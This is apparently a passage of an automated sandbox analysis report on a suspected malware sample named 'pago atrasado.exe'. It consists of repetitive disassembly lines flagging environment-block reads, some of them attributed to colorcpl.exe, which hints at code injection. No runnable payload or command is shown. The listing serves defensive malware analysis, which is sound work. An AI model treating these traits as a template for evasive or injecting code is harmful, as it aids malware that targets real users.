Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h] 1_2_00A94015
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h] 1_2_00A94015
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h] 1_2_009E0050
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h] 1_2_009E0050
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A82073 mov eax, dword ptr fs:[00000030h] 1_2_00A82073
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91074 mov eax, dword ptr fs:[00000030h] 1_2_00A91074
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A469A6 mov eax, dword ptr fs:[00000030h] 1_2_00A469A6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2990 mov eax, dword ptr fs:[00000030h] 1_2_009F2990
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA185 mov eax, dword ptr fs:[00000030h] 1_2_009FA185
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EC182 mov eax, dword ptr fs:[00000030h] 1_2_009EC182
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h] 1_2_009F61A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h] 1_2_009F61A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A541E8 mov eax, dword ptr fs:[00000030h] 1_2_00A541E8
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h] 1_2_009F513A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h] 1_2_009F513A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov ecx, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h] 1_2_009EB944
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h] 1_2_009EB944
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h] 1_2_009CB171
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h] 1_2_009CB171
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC962 mov eax, dword ptr fs:[00000030h] 1_2_009CC962
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h] 1_2_009FD294
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h] 1_2_009FD294
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 1_2_009DAAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 1_2_009DAAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FFAB0 mov eax, dword ptr fs:[00000030h] 1_2_009FFAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2ACB mov eax, dword ptr fs:[00000030h] 1_2_009F2ACB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2AE4 mov eax, dword ptr fs:[00000030h] 1_2_009F2AE4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E3A1C mov eax, dword ptr fs:[00000030h] 1_2_009E3A1C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h] 1_2_009CAA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h] 1_2_009CAA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h] 1_2_00A04A2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h] 1_2_00A04A2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov ecx, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D8A0A mov eax, dword ptr fs:[00000030h] 1_2_009D8A0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A8AA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A8AA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h] 1_2_00A7B260
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h] 1_2_00A7B260
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98A62 mov eax, dword ptr fs:[00000030h] 1_2_00A98A62
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0927A mov eax, dword ptr fs:[00000030h] 1_2_00A0927A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A54257 mov eax, dword ptr fs:[00000030h] 1_2_00A54257
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8EA55 mov eax, dword ptr fs:[00000030h] 1_2_00A8EA55
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2397 mov eax, dword ptr fs:[00000030h] 1_2_009F2397
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A95BA5 mov eax, dword ptr fs:[00000030h] 1_2_00A95BA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FB390 mov eax, dword ptr fs:[00000030h] 1_2_009FB390
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h] 1_2_009D1B8F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h] 1_2_009D1B8F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8138A mov eax, dword ptr fs:[00000030h] 1_2_00A8138A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7D380 mov ecx, dword ptr fs:[00000030h] 1_2_00A7D380
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h] 1_2_00A453CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h] 1_2_00A453CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EDBE9 mov eax, dword ptr fs:[00000030h] 1_2_009EDBE9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8131B mov eax, dword ptr fs:[00000030h] 1_2_00A8131B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CF358 mov eax, dword ptr fs:[00000030h] 1_2_009CF358
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CDB40 mov eax, dword ptr fs:[00000030h] 1_2_009CDB40
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h] 1_2_009F3B7A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h] 1_2_009F3B7A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98B58 mov eax, dword ptr fs:[00000030h] 1_2_00A98B58
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CDB60 mov ecx, dword ptr fs:[00000030h] 1_2_009CDB60
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D849B mov eax, dword ptr fs:[00000030h] 1_2_009D849B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A814FB mov eax, dword ptr fs:[00000030h] 1_2_00A814FB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98CD6 mov eax, dword ptr fs:[00000030h] 1_2_00A98CD6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h] 1_2_00A46C0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FBC2C mov eax, dword ptr fs:[00000030h] 1_2_009FBC2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA44B mov eax, dword ptr fs:[00000030h] 1_2_009FA44B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E746D mov eax, dword ptr fs:[00000030h] 1_2_009E746D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h] 1_2_00A5C450
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h] 1_2_009FFD9B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h] 1_2_00A905AC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h] 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h] 1_2_009F1DB5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F35A1 mov eax, dword ptr fs:[00000030h] 1_2_009F35A1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00A8FDE2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A78DF1 mov eax, dword ptr fs:[00000030h] 1_2_00A78DF1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h] 1_2_009DD5E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8E539 mov eax, dword ptr fs:[00000030h] 1_2_00A8E539
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A4A537 mov eax, dword ptr fs:[00000030h] 1_2_00A4A537
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98D34 mov eax, dword ptr fs:[00000030h] 1_2_00A98D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h] 1_2_009F4D3B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAD30 mov eax, dword ptr fs:[00000030h] 1_2_009CAD30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E7D50 mov eax, dword ptr fs:[00000030h] 1_2_009E7D50
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A03D43 mov eax, dword ptr fs:[00000030h] 1_2_00A03D43
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43540 mov eax, dword ptr fs:[00000030h] 1_2_00A43540
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h] 1_2_009EC577
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A446A7 mov eax, dword ptr fs:[00000030h] 1_2_00A446A7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 1_2_00A90EA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A5FE87
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F36CC mov eax, dword ptr fs:[00000030h] 1_2_009F36CC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00A7FEC0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A08EC7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h] 1_2_009F16E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h] 1_2_00A98ED6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h] 1_2_009D76E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h] 1_2_009FA61C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h] 1_2_00A7FE3F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h] 1_2_009CC600
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h] 1_2_009F8E00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h] 1_2_00A81608
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h] 1_2_009CE620
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 1_2_00A8AE44
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D766D mov eax, dword ptr fs:[00000030h] 1_2_009D766D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h] 1_2_009D8794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h] 1_2_00A47794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h] 1_2_00A037F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h] 1_2_009EF716
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h] 1_2_009FA70E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h] 1_2_00A9070D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h] 1_2_009FE730
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h] 1_2_009C4F2E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A5FF10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h] 1_2_00A98F6A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h] 1_2_009DEF40
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h] 1_2_009DFF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04550050 mov eax, dword ptr fs:[00000030h] 16_2_04550050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h] 16_2_045CC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04601074 mov eax, dword ptr fs:[00000030h] 16_2_04601074
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h] 16_2_0456A44B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h] 16_2_045F2073
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455746D mov eax, dword ptr fs:[00000030h] 16_2_0455746D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h] 16_2_045B7016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h] 16_2_045B6C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h] 16_2_045F1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0460740D mov eax, dword ptr fs:[00000030h] 16_2_0460740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04604015 mov eax, dword ptr fs:[00000030h] 16_2_04604015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456BC2C mov eax, dword ptr fs:[00000030h] 16_2_0456BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456002D mov eax, dword ptr fs:[00000030h] 16_2_0456002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h] 16_2_0454B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CB8D0 mov ecx, dword ptr fs:[00000030h] 16_2_045CB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F14FB mov eax, dword ptr fs:[00000030h] 16_2_045F14FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h] 16_2_045B6CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04608CD6 mov eax, dword ptr fs:[00000030h] 16_2_04608CD6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045358EC mov eax, dword ptr fs:[00000030h] 16_2_045358EC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454849B mov eax, dword ptr fs:[00000030h] 16_2_0454849B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04539080 mov eax, dword ptr fs:[00000030h] 16_2_04539080
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h] 16_2_045B3884
